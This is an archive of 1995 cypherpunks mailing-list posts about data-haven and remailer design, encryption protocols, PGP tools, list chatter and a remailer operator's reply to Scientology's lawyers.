There's an article today on Phiber's return to indecency, a recap of MOD
and celebratory party, with digs by unnabbed hiway-weebs. 
 
For copy send blank message with subject:  PHI_out




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Sat, 14 Jan 95 09:51:54 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <v02110104ab3db556857a@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


Paul, I think we're after two different objectives here. You want Alice to
be sure that Dave can't read her file; I want Dave to be sure that he can't
read Alice's files.

Alice should worry only about her privacy: if she doesn't want Dave to know
what she's sending, she should encrypt her file in a way that Dave cannot
break.

Dave certainly doesn't want to know what Alice is sending him, because he
might have to answer to a Grand Jury if he did. My protocal makes it very
difficult for Dave to gain any useful knowledge about Alice's files. Dave
does this not as a courtesy to Alice, but for those three wonderful
letters, CYA.

Of course, any data haven worth paying for will offer lots of neat
features, like PGP support, anonymous file drops, and all other sorts of
goodies. But that does little good if Alice can trick Dave into selling
child pornography.

Douglass Floyd asked, "How do I know if [be certain that] it's encrypted?"
Unfortunately, I'm pretty sure the answer is, "You decrypt it." My protocol
at least delays the decryption until it's [hopefully] too late to matter.

b&

[Here's part of the thread; nothing new follows.]

At 11:00 PM 1/13/95, Paul J. Ste. Marie wrote:
>At 10:07 PM 1/13/95, Ben Goren wrote:
>> ... Alice hashes her file and uses that hash as the key to encrypt the file.
>>She sends the file to Dave, and sends the original hash when she wants it
>>back. Dave decrypts, and confirms the hash.
>>
>>Unfortunately, this still doesn't quite close the loop--Dave knows the
>>contents of the file once Alice sends the key. It does, however, make it
>>very difficult for Dave to know anything about Alice's file. ...
>
>This seems overly complicated.  If Dave has a known public key, then Alice
>should be able to hash her file, sign the hash, encrypt (the hash, her
>public key, and the file) with Dave's public key, and (anonymously) sends
>the result to Dave's (encrypted) address.  Dave then decrypts, verifies the
>sig, and stores the file, hash, and PK together, indexed by the hash.
>
>When Alice wants the file back, she signs (the hash and her encrypted return
>address), encrypts the result with Dave's key, and sends it off.  Dave
>decrypts the request, fetchs the public key based on the decrypted hash,
>verifies the signature, encrypts the file with Alice's provided public key,
>and sends it back to the encrypted return address.
>
>To avoid Dave's knowing the file contents, Alice can encrypt it before the
>described protocol and decrypt it afterwards.  The protocol is subject to a
>replay attack, but the result of the replay would cause the file to be sent
>to the original sender and not to the replayer.
>
>The signed hash in the first step prevents people from spamming Dave with
>files that have Alice's public key.  Alice only requires an encrypted
>address and public key for Dave, and Dave validates the retrieval request
>against the public sent in the first step.
>
>    --Paul J. Ste. Marie
>      pstemari@well.sf.ca.us, pstemari@erinet.com

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0xCFF23BD5.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lce@wwa.com (Larry E)
Date: Sat, 14 Jan 95 10:31:21 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <9501140112.AB29647@eri.erinet.com>
Message-ID: <d-06lG9s1aL5075yn@wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9501140112.AB29647@eri.erinet.com>,
pstemari@erinet.com (Paul J. Ste. Marie) wrote:
> At 09:17 PM 1/12/95 -0600, Larry E wrote:
> 
> >         (2) legal groups etc. who may try to hold the remailer 
> >             liable in some way for what passes through their remailer.
> 
> It strikes me that this is a very weak defense.  Legal beagles will probably 
> argue that the remailer should have either prohibited encrypted 
> communications or else was in collusion with the sending party.
> 

Those who believe remailers are an evil will argue against any
measure that will promote their presence (and I'm not suggesting
you're in that group).  

I disagree strongly with their stance.  I would be happy if there
were three of four times as many remailers operating as there are
now.

The issue of whether encryption is a foolproof defense is not the
primary issue.  The issue is: what steps can be taken to improve the
lifespan of existing remailers and promote the addition of new ones.

Resolving the problems that cause remailers to fold will be an
evolutionary process, and no step along that path will be perfect or
resolve all the problems that plague the remailers. 

Is encryption a step in the right direction, if an imperfect one?  If
not I hope some other positive steps are proposed soon, else I fear
remailers may face extinction.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A.J. Janschewitz" <aj@pcnet.com>
Date: Sat, 14 Jan 95 09:46:07 PST
To: cypherpunks@toad.com
Subject: Media watch
Message-ID: <Pine.3.88.9501141224.B17993-0100000@pcnet1.pcnet.com>
MIME-Version: 1.0
Content-Type: text/plain


NPR's "Weekend Edition/Saturday" has an insubstantial piece on Phyber 
Optik on today's program, check local NPR times/listings.

Nexis-hunters might want to check out a manifestly stupid editorial in
today's Hartford (CT) Courant, significant only because it is the (L-A
Times-owned) paper of record in the state of greatest wealth in the U-S.
I would summarize it, but I don't understand it; something to do with
shrink-wrap copyrights and digital cash. 

Fax copies sent to interested parties, just give me a number.

==a.j.==

  "The large print giveth and the small print taketh away." - Tom Waits





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Sat, 14 Jan 95 10:29:55 PST
To: cypherpunks@toad.com
Subject: RE: State of PGP dll?; Encrypted session projects
Message-ID: <48550.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  sdw@lig.net (Stephen D. Williams)  writes:

> What is the state of the Windows/.dll PGP libraries?
> Does anyone have a usable version yet?

I helped David get a compiled version of a .DLL, but it was way too
raw to use. Specifically, all we did was make a DLL of all of the code,
exporting all of the subroutines. A usefull .DLL would only publish
the "important" ones, and leave the internals hidden. The selection
of which routines need to be classified as "important" is a bunch of
work. Additionally, I expect that some of the routines would really be
better off with a wrapper that made less of their internals visible.
All quite doable, but a non-trivial effort. I know I'm too busy to
attack it.

> For Windows: twnsck12.zip, which is simple, is GNU, and has source and
> by writing a relatively simple windows serial terminal emulator and
> using Comt ($15 or 25 shareware) to convert it to a telnet client.
> Both of these could be modified fairly easily.

There are sources to a simple terminal emulator in the MSVC samples
directory. Changing it to use sockets wouldn't be all that hard.
Last time I looked, comt didn't work under NT, and so I stopped looking
at it.

There are also terminal emulators in the code in at least two books,
Monk's Windows Programmer's Guide to Serial Communications,
and Nelson's Serial Communications, a C++ developers's Guide.
Since I'd much rather write C++ than C, I prefer Nelson's.

I use ewan as a terminal emulator, got it from cica or wustl, I forget
which. Dunno if sources are availavle.

> Does anyone have better ideas?  Any suggestions on login/key
> exchange sequence?

SKey would work if you are talking to a unix box that you can get
the admin to change.

Pat

Pat Farrell      Grad Student                 pfarrell@cs.gmu.edu
Department of Computer Science    George Mason University, Fairfax, VA
Public key availble via finger          #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 14 Jan 95 15:39:11 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <199501142339.PAA08580@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


If you want to not be able to read the files on your storage site, then
why not just try reading them?  Check their entropy to make sure it is
maximal, check that they can't be unzipped, unstuffed, displayed as gif
or jpeg files.  When a new format becomes popular add that to the list.
This is all you can do.

What does this gain you?  I'm not sure.  If someone posts encrypted
Windows 95, then publicizes the location and the key, people will get the
data just as easily as if it were not encrypted.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Sat, 14 Jan 95 16:24:34 PST
To: cypherpunks@toad.com
Subject: Self-service computers
Message-ID: <v02110104ab3e19c20cc1@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


A friend of mine forwarded this to me; I couldn't resist forwarding it to
the list.

b&
----

Date: 4 JAN 1995 16:32:23 -0500
From: Kay Lukens <klukens@halcyon.com>
Newgroups: alt.humor.best-of-usenet
Subject: [pdx.general] Re: Keep self-service COMPUTERS out of Oregon!

From: keithl@chip.klic.rain.com (Keith Lofstrom)
Newsgroups: pdx.general,or.politics
Subject: Re: Keep self-service COMPUTERS out of Oregon!

It has been pointed out by the stalwart defenders of our rights (to be told
what to do) that self-service for gasoline is a Bad Thing.  We are assured
by many of the same people that self-service for pharmaceuticals, personal
defense, transportation, and education are also Bad Things.  Other folks,
nominally their political competitors (in the same sense that Burgerville
and Burger King are competitors) assure us that self-service in personal
morality is an *extremely* Bad Thing.  And look at what happened to
Joycelin Elders when she suggested self-service for sex...

>From this, we must conclude that self-service is in itself highly suspicious.
Look at self-service grocery stores - all the time people are buying things
that are bad for them.  Self-service entertainment has resulted in Beavis
and Butthead.  And look at the way many computer professionals dress - if
this is not an indictment of self-service apparel, what is?

However, in the finest tradition of bureaucratic micromanagement, we as
computer professionals are not qualified to even consider these effects
on other aspects of Society.  Such thoughts must be reserved for Wiser
Heads Than Ours (unless of course the subject is economics or nuclear
power, in which case Our Opinions Count).

No, we as computer professionals must confine our thoughts to
self-service as it affects us - through our flagrant, dangerous,
and socially irresponsible use of Self-Service Computers!


Self-Service Computers:  Threat or Menace?

Carpal Tunnel Syndrome.  Backaches.  Obesity.  Bleeding Piles.  Bill
Gates and Steve Jobs.  Computers are a known health threat.  Reputed
Scientific Journals, such as the National Enquirer, are full of stories
of people being turned into three-headed cabbages by Nucular Radiation
from video displays.

It is obvious that the average computer professional, while quite able
to find obscure flaws in Pentiums or the secret levels in Doom, is a
helpless incompetent when it comes to actually typing on or reading from
personal computers.  We get so caught up in our alleged thinking that
we don't notice our bodies turning into rickety tubs of cancerous
lard.  We Need Help!

Meanwhile, the Great Unwashed Masses are being deprived access to
the Information Super Duper Highway.  Confined to low paying jobs
as sanitation workers or Congressional Representatives, these poor
wretches are unable to share in this cornucopia of undocumented,
virus-ridden software, poorly informed opinion, and stolen pornography
that we call the Internet.  These outcasts of the information age
must fritter away their time which such mind-numbing activities as
outdoor sports, rampant sex, and junkets to the Caribbean.

When these people accidentally find their way onto the Internet, perhaps
by mistakenly sending their rent check to America On Line, they begin
posting meaningless, inappropriate drivel such as spam advertisements
for shady lawyers, or actual referenced facts from original sources,
violating the hallowed traditions of the Internet.  While all citizens
must have access to the Net, LET'S NOT GET CARRIED AWAY HERE.


What Should We Do?  (That is, how can we find new excuses to control
other people with minority opinions?)


The only solution is to ELIMINATE self-service computers!  Every computer
in the State of Oregon *must* be operated by THREE OR MORE people - one
to do the thinking, one to do the typing, and one to read the screen -
preferably through a foot of leaded glass!  Think of all the jobs this
would create!  Not only would we have jobs for all the new operators
themselves, we could create vast new bureaucracies to insure that the
operators are specially trained, certified, and licensed!  Computer
Cops could roam the streets, equipped with special Jolt-sniffing dogs,
breaking down the doors of self-service scofflaws!  Pizza delivery
drivers would find new income and respect by turning in their hacker
clients!  Elizabeth Furse, famous for not reading her own email and for
having flunkies type in press releases, will become our shining symbol
of the new, socially responsible computer age!

You can help.  Send your checks to C.A.S.H., the Committee to Abolish
Selfservice Hardware, care of me (thnx Frank).  I will see that your
donation gets the attention it deserves.

And on behalf of all of us here at C.A.S.H. (Arnold who handles the left
side of the keyboard, Julia the right side, Millie the punctuation,
Sam who reads the verbs, Trevor who reads the nouns, and our shop
steward Penny, who is lobbying for a government grant to bring in a
mentally-challenged lesbian vegetarian special needs hispanic-surnamed
person of color to watch the blinky lights on the modem) may you have
an appropriate and socially enlightening seasonal celebration!

--
Moderators accept or reject articles based solely on the criteria posted
in the Frequently Asked Questions. Article content is the responsibility
of the submittor.  Submit articles to ahbou-sub@acpub.duke.edu. To write
to the moderators, send mail to ahbou-mod@acpub.duke.edu.

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0x875B059.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Sat, 14 Jan 95 16:28:35 PST
To: Raph Levien <raph@netcom.com>
Subject: Re: Draft of editorial to SF Chronicle
In-Reply-To: <199501140623.WAA14448@netcom4.netcom.com>
Message-ID: <Pine.3.89.9501141838.A25621-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain


editorial.rad.nice
even I'm still here..to show it works.
censored.org registration is finally in. Thankx <frissell@panix.com>
I can even use Lance's remailer correctly now.
and so I dont waste "bandwidth" this is end of screen. rad.editorial!

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Loren Fleckenstein <73211.3713@compuserve.com>
Date: Sat, 14 Jan 95 15:46:40 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: voice pgp
Message-ID: <950114234444_73211.3713_DHI35-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


I've heard mention that Phil Zimmermann was going to demonstrate Voice
PGP at the January Cypherpunks meeting at Cygnus. Can anyone mail me a
note about this? Has the meeting already taken place? How well did the
demo perform?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsled@free.org (Josh Michael Sled)
Date: Sat, 14 Jan 95 15:18:38 PST
To: cypherpunks@toad.com
Subject: Slogan/procmail help
Message-ID: <199501142337.XAA08521@squeaky.free.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Speaking of testing stuff....  

After my last question about C'punks slogans, I've messed up some
stuff and  haven't storage of the list since, therefore I don't have
any of the replies.  If anyone would like to compile a list of what's
been said (if anything) and  mail to to me (to jsled@ctp.org), I'd be
eternally grateful.

Also, if anyone is fluent in procmail (I think there are a couple of
you  floating around), please mail me at jsled@ctp.org...

Thanks a bunch, sorry for the annoyance.

Joshua M. Sled <jsled@ctp.org/jsled@free.org>

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBLxfoaaTT29daLBKRAQGXlQP/dYc4aPR7rNApmqG78jIDhYZJh6bqMg4i
AXVAAZ5IzLP4Z/qch7zkiTM05DjbmXOzkcVBmhlGlO+H2VfNug569A/jEKFnDrDs
wg0Rv5mPWLo74zUECHxp7faviAVmOxt7Bx3JzQCmHZXBekq+owUetEraq9hKzCzr
qQR+KUq3X+k=
=4gq8
-----END PGP SIGNATURE-----

---
  KWQ/2 1.2g NR  "MTV get off the air!" - DKs
                                                                                                       




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
Date: Sat, 14 Jan 95 20:45:53 PST
To: cypherpunks@toad.com
Subject: Another problem w/Data Havens...
Message-ID: <9501150445.AA13977@toad.com>
MIME-Version: 1.0
Content-Type: text



I can see a potential problem with Data Havens (as they've been discussed
here) that may very well inspire the wrath of the authorities more than
nuclear secrets or dirty pictures of J.Edgar Hoover...

How does one keep a site from becomming a remote pirated-software exchange
site? (Esp. since after that MIT case laws may be changed...) It seems that
such a service could become a magnet for the "elite warez" crowd... and even
if the operator isn't jailed it could lead to a shutdown of the service.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsled@free.org (Josh Michael Sled)
Date: Sat, 14 Jan 95 16:26:24 PST
To: cypherpunks@toad.com
Subject: Re: C`punks slogan? - Pri
Message-ID: <199501150045.AAA09400@squeaky.free.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

lmccarth@thor.cs.umass.ed wrote:

 > Lest we suffer a recurrence of the C'punks Logo thread, which generated a
 > whole raft of list traffic which would have been better kept private, please
 > reply directly to Joshua and not to the whole list. [He seems to imply that
 > he wants private replies ("testing procmail") anyway, but I want to encourage 
 > this practice explicitly.]


Thanks...  actually, that's exactly what I wanted, but forgot to put
it in...  and my last post about "Slogan help": disregard that
entirely... it's not  needed (either part).  But so far I've only gotten
one reply about the slogan  thing, so please give me help on that one,
folks...

Josh Sled <jsled@ctp.org/jsled@free.org>

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBLxf3kKTT29daLBKRAQGEWgQAhrKR/r/+mqXO63RN86c7hq3bsmid2KLU
ct2zJAebaZBzVvltrF3WsBYoWmCSo1tWrYFjv3QsU1gnRJRyxSGVtzzkfOSq7b51
UlGRzUb+6AXvviWmqdBwHGWbT4M6/mxxH8X8gC/eeFWyHMpgEcFzhV9tWUHCqkC/
GMDvXoaKPa0=
=i71M
-----END PGP SIGNATURE-----

---
  KWQ/2 1.2g NR  "MTV get off the air!" - DKs
                                                                 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Sat, 14 Jan 95 22:02:40 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <9501150554.AA29412@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:53 AM 1/14/95 -0600, Larry E wrote:
> ... Those who believe remailers are an evil will argue against any
>measure that will promote their presence (and I'm not suggesting
>you're in that group).  ...

True enough.

> ... Is encryption a step in the right direction, if an imperfect one?  If
>not I hope some other positive steps are proposed soon, else I fear
>remailers may face extinction.

The big problem I have with mandatory encryption for remailers is that it 
thwarts one of the two major purposes of remailers.  Basically I see 
remailers serving two goals:

        1)  Defeating traffic analysis of point-to-point communications.
            Mandating encryption for this is redundant--anyone who wanted this
            would be encrypting their mail to begin with.  Also, I don't     
               believe this mode of operation generates many complaints.

        2)  Anonymous broadcast transmission.  This one can generate a lot of
            complaints, but it is also very important for things like *.recovery
            newsgroups.  Mandating encryption renders this mode useless.

There is a third use, which is anonymous point-to-point transmission.  While 
this is of some benefit for anonymous tip line, it makes things like 
mailbombs and hate mail very easy.
        

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Sat, 14 Jan 95 22:02:48 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <9501150554.AB29412@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:51 AM 1/14/95 -0700, Ben.Goren@asu.edu wrote:
> ... Dave certainly doesn't want to know what Alice is sending him, because he
>might have to answer to a Grand Jury if he did. ...
>
>Of course, any data haven worth paying for will offer lots of neat
>features, like PGP support, anonymous file drops, and all other sorts of
>goodies. But that does little good if Alice can trick Dave into selling
>child pornography. ...

At 11:45 PM 1/14/95, Robert Rothenberg wrote:
> ... How does one keep a site from becomming a remote pirated-software exchange
>site? (Esp. since after that MIT case laws may be changed...) It seems that
>such a service could become a magnet for the "elite warez" crowd... and even
>if the operator isn't jailed it could lead to a shutdown of the service.

The whole point of a "data haven" is that the site of operation is in a 
jurisdiction where these things are not legal problems.  If you operate a DH 
in a location where child pornography/copyright laws are vigorously 
enforced, I really doubt that encryption is going to make any difference.  
As Robert rightly points out, a DH probably will become a location of 
massive copyright violation, etc ad nauseum.

I've cc'ed Mike Godwin on this in the hope that he can shed some light on 
what the scienter requirements for something like this would be.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lce@wwa.com (Larry E)
Date: Sun, 15 Jan 95 01:09:10 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <9501150554.AA29412@eri.erinet.com>
Message-ID: <p$D6lG9s1mGL075yn@wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9501150554.AA29412@eri.erinet.com>, 
   pstemari@erinet.com (Paul J. Ste. Marie) wrote:
> 
>         1)  Defeating traffic analysis of point-to-point communications.
>             Mandating encryption for this is redundant--anyone who wanted this
>             would be encrypting their mail to begin with.  Also, I don't     
>                believe this mode of operation generates many complaints.

Agreed.

> 
>         2)  Anonymous broadcast transmission.  This one can generate a lot of
>             complaints, but it is also very important for things like *.recovery
>             newsgroups.  Mandating encryption renders this mode useless.
>                          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Here, I don't understand your point.  If you mean an encrypted
message to a remailer cannot result in a plaintext usenet posting,
that of course is not true.  The remailers have PGP keys of their
own, just as any private user may.  In addition, some of the
remailers support direct usenet posting.  Thus, a message may be
encrypted to the remailer and posted as plaintext as the remailer
decrypts the message.


> There is a third use, which is anonymous point-to-point transmission.  While 
> this is of some benefit for anonymous tip line, it makes things like 
> mailbombs and hate mail very easy.
>         

Agreed.  At least some remailers accept requests from users that they
not receive anonymous mail.  The process of "kill-filing" outbound
anonymous mail targeted for specific locations could of course be
automated.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: j.hastings6@genie.geis.com
Date: Sun, 15 Jan 95 00:26:31 PST
To: cypherpunks@toad.com
Subject: L.A. area-Karl Hess Club
Message-ID: <199501150826.AA027478379@relay2.geis.com>
MIME-Version: 1.0
Content-Type: text/plain


The following was written by me, Kent Hastings:
Sorry, no PGP sig, I'm stranded in Chico,CA for a while...
     L O S   A N G E L E S   A R E A   M E E T I N G
"Extremism in the defense of liberty is no vice, and let me
remind you, moderation in the pursuit of justice is no virtue."
 - Aristotle, as used by Karl Hess for Barry Goldwater.
 
      ---   T h e   K a r l   H e s s   C l u b   ---
 
                    "GOODBYE, MURRAY!"
 
In the third meeting in the Post Election Series, we intended
to present an update on the Objectivists after our meetings
with the Republicans, the Libertarian Party, and Left Anarchists.
Unfortunately, the Ayn Rand Institute declined our invitation to address our
group on The Night Of January The 16th.
 
When readers of Liberty Magazine were asked to rate the
influence of various thinkers, at the top, with an equal
rating to Rand, was "Mr. Libertarian," Murray N. Rothbard, PhD.
 
Murray died last week, so we will instead have a special
Memorial tribute to his life and thought. He is best known
for his work in Austrian School economics and Libertarian
philosophy, and notorious for bashing Objectivists with
essays like "The Sociology of the Ayn Rand Cult." (Don't
worry, the abuse was mutual). His most recent libertarian
strategy was to make an alliance with the Old Right, a.k.a.
"Paleoconservatives." We hope you'll agree that this is
relevant in our Post Election environment.
 
Samuel Edward Konkin III (SEK3) knew Murray personally, and
credits him as a founder of the modern Libertarian movement
in written accounts in his magazine, New Libertarian. I assume
SEK3 will host tributes from others who also knew Murray.
 
Monday, January 16, 1995
Hasmik's Family Restaurant
Cheviot Hills neighborhood of Los Angeles
National Blvd (I think 9824 National)
 
Unfortunately, I can't attend this one because of the floods,
and I don't have the address handy, but it is the same time
and place as the last meeting.
 
Kent - j.hastings6@genie.geis.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Sun, 15 Jan 95 12:46:09 PST
To: cypherpunks@toad.com
Subject: Re: voice pgp
In-Reply-To: <950114234444_73211.3713_DHI35-1@CompuServe.COM>
Message-ID: <199501151705.JAA00195@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Loren Fleckenstein <73211.3713@compuserve.com>


   I've heard mention that Phil Zimmermann was going to demonstrate Voice
   PGP at the January Cypherpunks meeting at Cygnus. 

1.  We've been meeting at SGI for several months now.

2.  Phil Z. was there; there was no demo.  Draw your own conclusions.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Sun, 15 Jan 95 12:46:32 PST
To: wcs@anchor.ho.att.com
Subject: Re: Data Haven problems
In-Reply-To: <9501090448.AA14477@anchor.ho.att.com>
Message-ID: <Pine.SV4.3.91.950115101641.725A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> Some sites may only accept encrypted files, which reduces the spam 
> potential considerably, as well as reducing your exposure to the
> porn police, though it's difficult to do anything about files that are
> encrypted with a public key whose private key has been posted to the net,
> or fake crypto headers in an otherwise unencrypted file,

   This is interesting; during the last week or so that I've not been 
current with the list, I've started to implement a data-haven that takes 
information over sockets or MIME e-mail, and requires the use of PGP 
keypairs for the data.  I don't *WANT* to know what data they're 
transferring me.  If digicash would ever reply to one of my applications, 
I could sell it on a digicash/day basis.  Blah.  Neat idea, but the $ 
part is kinda limiting.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Sun, 15 Jan 95 12:46:22 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: Crypto functions
In-Reply-To: <9501102208.AA26444@snark.imsi.com>
Message-ID: <Pine.SV4.3.91.950115103408.725B-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> I wouldn't use BLOWFISH. 

   Why?

> MD4 is flawed -- and its a hash function, not a crypto function (as is 
> MD5). 

   I'm curious - do you view one-way hash functions as nonessential for 
crypto?

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Sun, 15 Jan 95 12:45:33 PST
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Dangerous Web Site
In-Reply-To: <Pine.ULT.3.91.950113112935.6321A-100000@krypton.mankato.msus.edu>
Message-ID: <Pine.SV4.3.91.950115110500.725C-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> They do credit checks of any person, SS# ID's, national database 
> searches, etc of any person or business (for a small fee).

   I actually found it at the "Internet Credit Bureau": 
http://www.satelnet.org/credit/ .. their e-mail address is icb@satelnet.org.

   It strikes me that their service makes it incredibly easy to breach 
the Fair Credit Reporting Act..

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Sun, 15 Jan 95 12:41:36 PST
To: lcottrell@popmail.ucsd.edu
Subject: Re: Scientology
Message-ID: <ab3f26ae01021004e8c7@[137.110.24.249]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

                                                         1/15/95 

TO:    THOMAS M. SMALL
       COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE
       PUBLICATIONS, INC.

FROM:  Lance Cottrell
       Operator of remailer@nately and mixmaster@nately

In response to your email of January 3, 1995 requesting that I block anonymous posting to the Internet news groups alt.clearing.technology and alt.religion.scientology.

Although my remailers have always supported direct posting to news groups, this feature has never been advertised or supported. Since direct posting from my remailers is never used, I am willing to comply with your request. Posting to alt.clearing.technology and alt.religion.scientology has been blocked.

By this action I do not admit to any wrongdoing on my part, nor do I wish to imply any wrongdoing on the part of any users of my remailers. I am merely turning of a feature that I never intended to be used.

By design it is not possible to prevent users from using my remailers to send a message to another computer to be posted. I can not, and will not, block mail to other remailers or to mail-to-news gateways.

                                Yours,
                                        Lance M. Cottrell

CC: Cypherpunks@toad.com, remailer-operators@c2.org,
    alt.privacy.anon-server, alt.privacy,
    alt.religion.scientology, alt.clearing.technology

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLxl9WlVkk3dax7hlAQH5lAP9HWND3nMsoz/Yn6fz36iqtDqI7s3cEllM
Gaajeq4qAR/t5a5CrEyOW1sYq+bxw5UZppREJC5uBbcp7ZP2k/7jprEcq9O7run3
ZX985aIY8f5kI6GmUemhmQcflgyNDoeDJMFhRBrvDQqCWueLKVUZLNXx9bsMCi94
EH/mStSfdJY=
=UgN1
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsled@free.org (Josh Michael Sled)
Date: Sun, 15 Jan 95 12:48:04 PST
To: cypherpunks@toad.com
Subject: Re: C`punks slogan? - Pri
Message-ID: <199501151237.MAA02068@squeaky.free.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

lmccarth@thor.cs.umass.ed wrote:

 > Lest we suffer a recurrence of the C'punks Logo thread, which generated a
 > whole raft of list traffic which would have been better kept private, please
 > reply directly to Joshua and not to the whole list. [He seems to imply that
 > he wants private replies ("testing procmail") anyway, but I want to encourage 
 > this practice explicitly.]


Thanks...  actually, that's exactly what I wanted, but forgot to put
it in...  and my last post about "Slogan help": disregard that
entirely... it's not  needed (either part).  But so far I've only gotten
one reply about the slogan  thing, so please give me help on that one,
folks...

Josh Sled <jsled@ctp.org/jsled@free.org>

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBLxf3kKTT29daLBKRAQGEWgQAhrKR/r/+mqXO63RN86c7hq3bsmid2KLU
ct2zJAebaZBzVvltrF3WsBYoWmCSo1tWrYFjv3QsU1gnRJRyxSGVtzzkfOSq7b51
UlGRzUb+6AXvviWmqdBwHGWbT4M6/mxxH8X8gC/eeFWyHMpgEcFzhV9tWUHCqkC/
GMDvXoaKPa0=
=i71M
-----END PGP SIGNATURE-----

---
  KWQ/2 1.2g NR  "MTV get off the air!" - DKs
                                                                 




